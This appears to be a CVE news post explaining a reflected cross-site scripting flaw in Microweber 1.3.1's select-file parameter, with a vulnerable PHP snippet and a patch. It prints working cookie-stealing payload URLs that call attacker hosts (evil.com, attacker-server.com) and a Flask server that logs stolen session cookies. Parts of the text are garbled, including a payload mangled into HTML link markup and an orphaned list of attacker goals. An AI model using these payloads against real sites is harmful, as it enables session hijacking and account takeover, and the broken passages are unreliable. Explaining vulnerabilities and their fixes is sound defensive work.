CVE CyberSecurity Database News

CVE-2022-0698 - How an Unauthenticated XSS in Microweber 1.3.1 Allows Account Takeover

Poster -

Microweber, an open-source drag-and-drop website builder, is known for its flexibility and ease of use. But, like all software, it’s not immune to security vulnerabilities. One such flaw, CVE-2022-0698, found in version 1.3.1, can let a hacker take over a user’s account—no password, no authentication needed. This post breaks down the vulnerability, gives a live code demonstration, and explains how an attacker could exploit it.

What is CVE-2022-0698?

CVE-2022-0698 is a Cross-Site Scripting (XSS) vulnerability found in Microweber 1.3.1. The issue lives in the select-file parameter on the platform. Basically, the web app doesn't clean up what a user submits in that field. So, a crafty attacker can inject malicious JavaScript, which runs in a logged-in user's browser, stealing their session, changing their password, or worse.

Original reference:  
- huntr.dev report  
- NVD Entry

Where’s the Bug?

The vulnerable code is in the way Microweber renders files selected by users. Instead of sanitizing user input, it echoes it directly in the page. Here’s a simplified PHP code snippet taken from a vulnerable version:

<?php
// Vulnerable handler for select-file parameter
if (isset($_GET['select-file'])) {
    $file = $_GET['select-file'];
    echo "<div>Selected file: $file</div>";
}
?>

No validation or escaping there! That means anything submitted in the select-file field will show up on the page, unfiltered.

`text

https://victim-site.com/page?select-file=fetch('<a href="https://evil.com/steal?cookie='+document.cookie" rel="nofollow">https://evil.com/steal?cookie='+document.cookie</a>)

Full Proof of Concept (PoC)

Here’s a working demo you can try on a test or vulnerable site (never against real users or production servers):

Malicious URL

https://example.com/page?select-file=<script>new Image().src='https://attacker-server.com/steal?cookie='+document.cookie;</script>;

If a logged-in administrator loads this page, their browser runs the JavaScript, sending their session cookie to the attacker's server.

The attacker listens on their server for stolen cookies

from flask import Flask, request

app = Flask(__name__)

@app.route('/steal')
def steal():
    cookie = request.args.get('cookie')
    print("Stolen cookie: ", cookie)
    return '', 204

if __name__ == '__main__':
    app.run(host='...', port=80)

Install malware on the site.

- Access sensitive/private data.

No authentication needed—the attacker just needs a user with higher privileges to click their crafted link.

How to Fix

The root problem is that user input goes directly to HTML with no filtering or escaping. Here’s a quick fix:

Patch Example

if (isset($_GET['select-file'])) {
    $file = htmlspecialchars($_GET['select-file'], ENT_QUOTES, 'UTF-8');
    echo "<div>Selected file: $file</div>";
}

Use htmlspecialchars. Upgrade to a fixed version if possible (Microweber has patched this issue).

Conclusion

CVE-2022-0698 is a classic example of why input validation is crucial. Microweber 1.3.1's simple oversight in handling the select-file parameter lets attackers inject scripts and take over accounts.  
If you use Microweber, update immediately!  
Always sanitize and escape user input; your users’ security depends on it.

References

- huntr.dev Advisory
- NVD CVE-2022-0698
- Microweber security commits

Timeline

Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/30/2022 16:07:00 UTC